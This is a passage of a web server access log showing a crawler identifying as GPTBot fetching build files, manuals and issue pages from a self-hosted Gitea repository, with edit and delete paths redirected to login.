"/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14333] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11612] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 13143] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10983] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:17:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:17:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:17:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10901] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" +[17/Feb/2026:17:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:17:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10900] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:17:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 9855] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md" +[17/Feb/2026:17:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 2092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14599] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:17:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 12994] [Gzip 7.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:17:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10781] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:17:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9994] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:17:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" [Client 74.7.227.38] [Length 1254] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:17:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17361] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21437] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md?display=rendered" [Client 74.7.227.38] [Length 17362] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21436] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md?display=source" [Client 74.7.227.38] [Length 21436] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md" +[17/Feb/2026:17:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11058] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" +[17/Feb/2026:17:31:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:17:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:17:31:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:17:31:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:17:31:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__init__.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:17:31:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:17:31:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15644] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15646] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:31:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15643] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15643] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:31:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15644] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15646] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:31:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15644] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:31:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:17:31:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 9800] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libmodbus-5.dll" +[17/Feb/2026:17:31:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13929] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:31:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10128] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:31:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9955] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:31:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9955] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:31:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:31:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9953] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9955] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:17:31:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 17053] [Gzip 12.03] [Sent-to 192.168.0.250] "Mozilla/5.0 